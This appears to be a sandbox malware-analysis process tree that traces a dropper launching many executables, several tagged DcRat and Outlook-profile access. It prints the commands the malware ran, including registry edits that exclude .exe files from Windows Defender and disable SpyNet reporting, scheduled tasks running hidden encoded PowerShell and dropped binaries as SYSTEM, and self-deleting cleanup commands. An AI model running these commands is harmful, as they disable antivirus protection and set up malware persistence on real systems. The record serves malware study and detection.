C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&9⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3210⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6410⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&9⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3210⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6410⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "govDkIljJ" /SC once /ST 03:11:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="8⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "govDkIljJ"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "govDkIljJ"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 22:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\hmLVLft.exe\" 3Y /nQsite_idrgh 385118 /S" /V1 /F8⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bwpFiyeZPJPVdaMxTt"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 00:45:22 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\RLuQQTfvaNwaabW\VDuuIfV.exe\" KS /gwsite_idzsZ 385118 /S" /V1 /F8⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GyWbuVQzPmDmgkCMH"8⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"8⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:328⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:329⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:648⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:649⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\FSwinf.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F8⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\BV92spfO9MraanU7f75PjgBm.exe"C:\Users\Admin\Pictures\BV92spfO9MraanU7f75PjgBm.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\5Dnld3OKf0xcUJ2oCHAiKfWJ.exe"C:\Users\Admin\Pictures\5Dnld3OKf0xcUJ2oCHAiKfWJ.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\ra0x7SHVhCz77m81UmK9oB2L.exe"C:\Users\Admin\Pictures\ra0x7SHVhCz77m81UmK9oB2L.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\ra0x7SHVhCz77m81UmK9oB2L.exe"C:\Users\Admin\Pictures\ra0x7SHVhCz77m81UmK9oB2L.exe"6⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\WE2RLAWW8TYQ45Kd23OJLV8i.exe"C:\Users\Admin\Pictures\WE2RLAWW8TYQ45Kd23OJLV8i.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\WE2RLAWW8TYQ45Kd23OJLV8i.exe" & exit6⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Gfxnj05oL1lX6w5wMgQYcX7n.exe"C:\Users\Admin\Pictures\Gfxnj05oL1lX6w5wMgQYcX7n.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Users\Admin\Pictures\eFtLZm9AbReDVBqedrh1NOb7.exe"C:\Users\Admin\Pictures\eFtLZm9AbReDVBqedrh1NOb7.exe"5⤵
-
C:\Users\Admin\Pictures\Bu4bhbRc6n7MIJKe02GfMXQN.exe"C:\Users\Admin\Pictures\Bu4bhbRc6n7MIJKe02GfMXQN.exe"5⤵
-
C:\Users\Admin\Pictures\dpKygJnOzeCoGoO8HQkRthT9.exe"C:\Users\Admin\Pictures\dpKygJnOzeCoGoO8HQkRthT9.exe"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Users\Admin\Pictures\de2tQnd2IDHvbiblHbvDLOc6.exe"C:\Users\Admin\Pictures\de2tQnd2IDHvbiblHbvDLOc6.exe"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Users\Admin\Pictures\gGJWrQUMe4PSk05zFsks1QGL.exe"C:\Users\Admin\Pictures\gGJWrQUMe4PSk05zFsks1QGL.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\gGJWrQUMe4PSk05zFsks1QGL.exe"C:\Users\Admin\Pictures\gGJWrQUMe4PSk05zFsks1QGL.exe"6⤵
-
C:\Users\Admin\Pictures\cZjKW3KrX24g0ttRpkKiHMGk.exe"C:\Users\Admin\Pictures\cZjKW3KrX24g0ttRpkKiHMGk.exe" --silent --allusers=05⤵
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\cZjKW3KrX24g0ttRpkKiHMGk.exeC:\Users\Admin\Pictures\cZjKW3KrX24g0ttRpkKiHMGk.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x67e48538,0x67e48548,0x67e485546⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\cZjKW3KrX24g0ttRpkKiHMGk.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\cZjKW3KrX24g0ttRpkKiHMGk.exe" --version6⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\sCxmwulTsChn1nYDy9rN4XKW.exe"C:\Users\Admin\Pictures\sCxmwulTsChn1nYDy9rN4XKW.exe"5⤵
-
C:\Users\Admin\Pictures\VdafFZqiLiS5YHZiSTwdh9sM.exe"C:\Users\Admin\Pictures\VdafFZqiLiS5YHZiSTwdh9sM.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS727E.tmp\Install.exe.\Install.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS77FD.tmp\Install.exe.\Install.exe /dcCcdidRiisJ "385118" /S7⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&9⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3210⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6410⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&9⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3210⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6410⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcBIldnfu" /SC once /ST 12:33:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="8⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcBIldnfu"8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcBIldnfu"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 22:22:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\LXRIFPe.exe\" 3Y /yIsite_idTtK 385118 /S" /V1 /F8⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\cn3W2oiFgEpUTHLheQ9x6Fpn.exe"C:\Users\Admin\Pictures\cn3W2oiFgEpUTHLheQ9x6Fpn.exe"5⤵
-
C:\Users\Admin\Pictures\vGlAaVxREmat8NESyYCUALV9.exe"C:\Users\Admin\Pictures\vGlAaVxREmat8NESyYCUALV9.exe"5⤵
-
C:\Users\Admin\Pictures\AkOdQN1cPdsAPFWQ8DNJhN6O.exe"C:\Users\Admin\Pictures\AkOdQN1cPdsAPFWQ8DNJhN6O.exe"5⤵
-
C:\Users\Admin\Pictures\3ZrAaAUUqbsJ2q25JL3G8C6w.exe"C:\Users\Admin\Pictures\3ZrAaAUUqbsJ2q25JL3G8C6w.exe"5⤵
-
C:\Users\Admin\Pictures\3ZrAaAUUqbsJ2q25JL3G8C6w.exe"C:\Users\Admin\Pictures\3ZrAaAUUqbsJ2q25JL3G8C6w.exe"6⤵
-
C:\Users\Admin\Pictures\WrnzIC64fsCSRhFlmfvXpOYO.exe"C:\Users\Admin\Pictures\WrnzIC64fsCSRhFlmfvXpOYO.exe" --silent --allusers=05⤵
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Users\Admin\Pictures\WrnzIC64fsCSRhFlmfvXpOYO.exeC:\Users\Admin\Pictures\WrnzIC64fsCSRhFlmfvXpOYO.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x67488538,0x67488548,0x674885546⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WrnzIC64fsCSRhFlmfvXpOYO.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\WrnzIC64fsCSRhFlmfvXpOYO.exe" --version6⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\NAGu9BX0d4J3vGgY41aDLSOK.exe"C:\Users\Admin\Pictures\NAGu9BX0d4J3vGgY41aDLSOK.exe"5⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\NAGu9BX0d4J3vGgY41aDLSOK.exe" & exit6⤵
-
C:\Users\Admin\Pictures\9tmgMcTnjrZJKZBJAEBP8NA8.exe"C:\Users\Admin\Pictures\9tmgMcTnjrZJKZBJAEBP8NA8.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Drops file in Program Files directory
-
C:\Users\Admin\Pictures\3FqvQM2nQO2NDCjFXgs4PAeK.exe"C:\Users\Admin\Pictures\3FqvQM2nQO2NDCjFXgs4PAeK.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS9BC4.tmp\Install.exe.\Install.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSA549.tmp\Install.exe.\Install.exe /dcCcdidRiisJ "385118" /S7⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"8⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gfAaXMcxR" /SC once /ST 18:28:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="8⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gfAaXMcxR"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gfAaXMcxR"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 22:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\jlASGXm.exe\" 3Y /YDsite_idBQL 385118 /S" /V1 /F8⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\ovQo6URi4J66mRnK6VPJ3XBs.exe"C:\Users\Admin\Pictures\ovQo6URi4J66mRnK6VPJ3XBs.exe"5⤵
-
C:\Users\Admin\Pictures\uFHmnH2W9xvoVEnq39T70DGb.exe"C:\Users\Admin\Pictures\uFHmnH2W9xvoVEnq39T70DGb.exe"5⤵
-
C:\Users\Admin\Pictures\WrSIf1mHFCVykbFm1LpZ9P4C.exe"C:\Users\Admin\Pictures\WrSIf1mHFCVykbFm1LpZ9P4C.exe"5⤵
-
C:\Users\Admin\Pictures\5zCloMPLDESrafNVL3Ft54OO.exe"C:\Users\Admin\Pictures\5zCloMPLDESrafNVL3Ft54OO.exe"5⤵
-
C:\Users\Admin\Pictures\UNpBcwwvpIi6fJlR3oPTIPHq.exe"C:\Users\Admin\Pictures\UNpBcwwvpIi6fJlR3oPTIPHq.exe"5⤵
-
C:\Users\Admin\Pictures\YQp7qLwBLKD453EdMzZW4NEl.exe"C:\Users\Admin\Pictures\YQp7qLwBLKD453EdMzZW4NEl.exe" --silent --allusers=05⤵
-
C:\Users\Admin\Pictures\YQp7qLwBLKD453EdMzZW4NEl.exeC:\Users\Admin\Pictures\YQp7qLwBLKD453EdMzZW4NEl.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b8,0x2bc,0x2c0,0x2b4,0x2c4,0x665e8538,0x665e8548,0x665e85546⤵
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\YQp7qLwBLKD453EdMzZW4NEl.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\YQp7qLwBLKD453EdMzZW4NEl.exe" --version6⤵
-
C:\Users\Admin\Pictures\cMAJIIfA78smYFrjJb76zVX6.exe"C:\Users\Admin\Pictures\cMAJIIfA78smYFrjJb76zVX6.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS1CD0.tmp\Install.exe.\Install.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS5323.tmp\Install.exe.\Install.exe /dcCcdidRiisJ "385118" /S7⤵
- Checks BIOS information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\a\sogn.exe"C:\Users\Admin\AppData\Local\Temp\a\sogn.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\a\sogn.exe"C:\Users\Admin\AppData\Local\Temp\a\sogn.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\sogn.exe"C:\Users\Admin\AppData\Local\Temp\a\sogn.exe"4⤵
- DcRat
- Adds Run key to start application
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe"C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe"C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe"4⤵
- Accesses Microsoft Outlook profiles
-
C:\Users\Admin\AppData\Local\Temp\a\abun.exe"C:\Users\Admin\AppData\Local\Temp\a\abun.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\a\abun.exe"C:\Users\Admin\AppData\Local\Temp\a\abun.exe"4⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe"C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe" & del "C:\ProgramData\*.dll"" & exit4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 55⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exe"C:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exeC:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exe4⤵
- Accesses Microsoft Outlook profiles
-
C:\Users\Admin\AppData\Local\Temp\a\PO.pdf.exe"C:\Users\Admin\AppData\Local\Temp\a\PO.pdf.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe"4⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe"5⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\a\DH.exe"C:\Users\Admin\AppData\Local\Temp\a\DH.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\a\DH.exe"C:\Users\Admin\AppData\Local\Temp\a\DH.exe"4⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\a\raaa.exe"C:\Users\Admin\AppData\Local\Temp\a\raaa.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\a\raaa.exe"C:\Users\Admin\AppData\Local\Temp\a\raaa.exe"4⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\a\txx.exe"C:\Users\Admin\AppData\Local\Temp\a\txx.exe"3⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\a\txx.exe"C:\Users\Admin\AppData\Local\Temp\a\txx.exe"4⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\a\aao.exe"C:\Users\Admin\AppData\Local\Temp\a\aao.exe"3⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\a\aao.exe"C:\Users\Admin\AppData\Local\Temp\a\aao.exe"4⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\a\ezy.exe"C:\Users\Admin\AppData\Local\Temp\a\ezy.exe"3⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\a\ezy.exe"C:\Users\Admin\AppData\Local\Temp\a\ezy.exe"4⤵
- Accesses Microsoft Outlook profiles
-
C:\Users\Admin\AppData\Local\Temp\a\Tues.....exe"C:\Users\Admin\AppData\Local\Temp\a\Tues.....exe"3⤵
- DcRat
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\a\HQR8391000.pdf.exe"C:\Users\Admin\AppData\Local\Temp\a\HQR8391000.pdf.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\HQR8391000.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\HQR8391000.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\HQR8391000.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\HQR8391000.exe"5⤵
- Adds Run key to start application
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Users\Admin\AppData\Local\Temp\a\newrock.exe"C:\Users\Admin\AppData\Local\Temp\a\newrock.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"4⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"5⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Users\Admin\AppData\Local\Temp\kos2.exe"C:\Users\Admin\AppData\Local\Temp\kos2.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\set16.exe"C:\Users\Admin\AppData\Local\Temp\set16.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SA1KK.tmp\is-1GOK2.tmp"C:\Users\Admin\AppData\Local\Temp\is-SA1KK.tmp\is-1GOK2.tmp" /SL4 $1001E6 "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 522246⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Program Files (x86)\MyBurn\MyBurn.exe"C:\Program Files (x86)\MyBurn\MyBurn.exe" -i7⤵
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" helpmsg 207⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 helpmsg 208⤵
-
C:\Program Files (x86)\MyBurn\MyBurn.exe"C:\Program Files (x86)\MyBurn\MyBurn.exe" -s7⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Users\Admin\AppData\Local\Temp\K.exe"C:\Users\Admin\AppData\Local\Temp\K.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\latestX.exe"C:\Users\Admin\AppData\Local\Temp\latestX.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\foto2552.exe"C:\Users\Admin\AppData\Local\Temp\a\foto2552.exe"3⤵
- Adds Run key to start application
-
